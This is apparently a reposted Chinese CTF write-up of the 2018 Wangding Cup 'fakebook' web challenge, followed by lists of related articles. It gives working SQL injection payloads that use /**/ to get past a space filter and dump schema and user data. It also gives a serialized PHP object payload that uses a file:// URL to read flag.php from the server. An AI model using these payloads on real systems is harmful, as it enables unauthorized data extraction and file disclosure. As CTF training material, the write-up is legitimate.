[CTF/网络安全] fakebook（网鼎杯2018）解题详析 - 代码天地

[CTF/网络安全] fakebook（网鼎杯2018）解题详析

业界资讯 2023-07-25 17:22:10 阅读次数: 0

[CTF/网络安全] fakebook（网鼎杯2018）

- 姿势
- 总结

姿势

登录后发现传参，构造字符型参数，回显error

在这里插入图片描述
判断为数字型注入，查看注入点数目：

在这里插入图片描述
由上下两张图可知注入点数目为4

在这里插入图片描述

查库名：

在这里插入图片描述

经测试可知对空格进行过滤，可通过/**/或+绕过，但程序也过滤了+，因此使用前者

在这里插入图片描述
no改为0的原因是使程序报错，从而回显库名fakebook

爆表名：

no=0/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from information_schema.tables/**/where/**/table_schema='fakebook'),3,4--+

在这里插入图片描述

爆users表的列名：

no=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users'),3,4--+

在这里插入图片描述

爆data列的数据：

no=0/**/union/**/select/**/1,(select/**/group_concat(data)/**/from/**/users),3,4--+

在这里插入图片描述

构造POC使其反序列化执行构造函数：

no=0/**/union/**/select/**/1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'--+

由于blog属性在第四位，因此构造POC时需注意顺序
将https://blog.csdn.net/2301_77485708?spm=1000.2115.3001.5343改为file:///var/www/html/flag.php，使其读取flag.php

执行成功：
在这里插入图片描述
查看源码：

在这里插入图片描述
将其解码即可得到flag

在这里插入图片描述

总结

以上为[CTF/网络安全] fakebook（网鼎杯2018）解题详析，考察SQL注入、序列化与反序列化等知识点。

我是秋说，我们下次见。

猜你喜欢

转载自blog.csdn.net/2301_77485708/article/details/131775376

[CTF/网络安全] fakebook（网鼎杯2018）解题详析

[CTF/网络安全] 攻防世界 easytornado 解题详析[护网杯 2018 easy_tornado]

[网络安全/CTF]护网杯 2018 easy_tornado 解题详析（Tornado之SSTI注入）

[CTF/网络安全] 攻防世界 backup 解题详析

[CTF/网络安全] 攻防世界 shrine 解题详析

[CTF/网络安全] 攻防世界 lottery 解题详析

[CTF/网络安全] 攻防世界 inget 解题详析

[CTF/网络安全] 攻防世界 easyupload 解题详析

[CTF/网络安全] 攻防世界文件包含（泰山杯）解题详析

中国顶级CTF竞赛网络安全大赛--2022网鼎杯re2解题思路

[CTF/网络安全] 攻防世界 view_source 解题详析

[CTF/网络安全] 攻防世界 PHP2 解题详析

[CTF/网络安全] 攻防世界 simple_php 解题详析

[CTF/网络安全] 攻防世界 wife_wife 解题详析

[CTF/网络安全] 攻防世界 fileinclude 解题详析（php伪协议）

[CTF/网络安全] 攻防世界 fileclude 解题详析（php伪协议）

网络安全 CTF 之最新网鼎杯解题思路

[网络安全/CTF] 记一次PHP序列化反序列化解题详析

2018年浙江省网络安全技能竞赛ctf部分解题思路writeup

2018网鼎杯 Fakebook

[网鼎杯 2018]Fakebook

【网鼎杯2018】fakebook

[CTF/网络安全] 攻防世界 very_easy_sql 解题详析（gopher协议+ssrf漏洞sql注入+盲注脚本）

[CTF/网络安全] 攻防世界 file_include 解题详析（php伪协议+convert转换过滤器）

[网络安全/CTF] BUUCTF极客大挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)

[CTF/网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)

[CTF]2021春秋杯网络安全联赛秋季赛勇者山峰部分writeup

第一届赣网杯网络安全大赛 2020GW-CTF Writeup

【BUUCTF】[网鼎杯 2018]Fakebook

[网鼎杯 2018]Fakebook 1

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

循环神经网络（rnn）讲解

Tigao教程四：单独的关节运动

金蝶K3WISE15.0-注册套打教程

如何在Mac上配置Kubernetes

Android应用结束自身进程的方法

SpringMVC学习十三拦截器栈

中国驻洛杉矶总领馆举行新春招待会

HttpClient get post 发送

11 - three.js 笔记 - 绘制三维字体模型

Mysql递归获取某个父节点下面的所有子节点和子节点上的所有父节点

每日归档

更多

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)